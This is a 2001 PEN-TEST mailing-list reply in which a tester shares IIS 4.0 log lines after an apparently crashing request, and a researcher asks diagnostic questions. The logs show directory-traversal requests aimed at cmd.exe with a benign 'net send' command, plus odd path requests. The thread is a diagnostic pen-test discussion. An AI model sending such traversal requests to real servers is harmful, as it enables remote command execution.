Re: [PEN-TEST] iis 4.0 pen-test

[Sean <yupdef56 () YAHOO COM>]

here is the section of the log starting with the first
two requests that i sent, 45 Normal get requests and
about 6 more .. tests.  I was testing for unicode
vulnerabilities from a browser.  Have not reproduced
it yet b/c it is a production system.  Also, you may
have seen the suggestions on PEN-TEST, but the hotfix
mentioned is pre-sp6a and will not install.

2001-02-21 08:27:18 from.adress.xxx.yyy - W3SVC1
WEBSTER web.adress.xxx.yyy GET //../protect/cmd.exe
/c+net+send+computer+hello 404 123 623 360 10 80
HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC -
2001-02-21 08:27:42 from.adress.xxx.yyy - W3SVC1
WEBSTER web.adress.xxx.yyy GET //../protect/cmd.exe
/c+net+send+computer+hello 404 123 623 357 0 80
HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC -
<45 "NORMAL GET REQUESTS">
2001-02-21 08:27:56 from.adress.xxx.yyy - W3SVC1
WEBSTER web.adress.xxx.yyy GET
/exchange/USA//../protect/cmd.exe
/c+net+send+computer+hello 403 5 757 366 0 80 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC -
2001-02-21 08:32:20 from.adress.xxx.yyy - W3SVC1
WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123
623 319 10 443 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -
2001-02-21 08:32:31 from.adress.xxx.yyy - W3SVC1
WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123
623 322 0 443 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -
2001-02-21 08:32:38 from.adress.xxx.yyy - W3SVC1
WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123
623 322 0 443 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -
2001-02-21 08:32:42 from.adress.xxx.yyy - W3SVC1
WEBSTER web.adress.xxx.yyy GET /../../texy.txt - 404
123 623 321 0 443 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -
2001-02-21 08:33:06 from.adress.xxx.yyy - W3SVC1
WEBSTER web.adress.xxx.yyy GET /...*/text.txt - 404
123 623 316 10 443 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT)
ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP -

--- Marc Maiffret <marc () eeye com> wrote:
> So when you connected to the web server port what
> command did you actually
> send?
>
> When it crash were you still able to connect to port
> 80 or not?
>
> Before you sent this request did you send a lot of
> other GET requests with
> invalid characters in file names? For example
> !@#$%^&*() etc...?
>
> Signed,
> Marc Maiffret
> Chief Hacking Officer
> eCompany / eEye
> T.949.349.9062
> F.949.349.9538
> http://eEye.com
>
>
> | -----Original Message-----
> | From: Penetration Testers
> [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf
> | Of Sean
> | Sent: Thursday, February 22, 2001 4:43 PM
> | To: PEN-TEST () SECURITYFOCUS COM
> | Subject: iis 4.0 pen-test
> |
> |
> | i'm pen-testing an iis 4.0 box; the following get
> req.
> | crashed the server (stopped responding to http
> reqs
> | and rpc comms stopped to - could still ping it and
> | processor and mem were normal).
> |
> | GET /...*/text.txt - 404 123 623 316 10 443
> HTTP/1.1
> | Mozilla/4.0+blahblahblah
> |
> | any idea what patch fixes this one or what vuln it
> is
> | ?
> |
> | thanks
> |
> | sean
> |
> |
> | __________________________________________________
> | Do You Yahoo!?
> | Yahoo! Auctions - Buy the things you want at great
> prices!
> http://auctions.yahoo.com/


__________________________________________________
Do You Yahoo!?
Yahoo! Auctions - Buy the things you want at great prices! http://auctions.yahoo.com/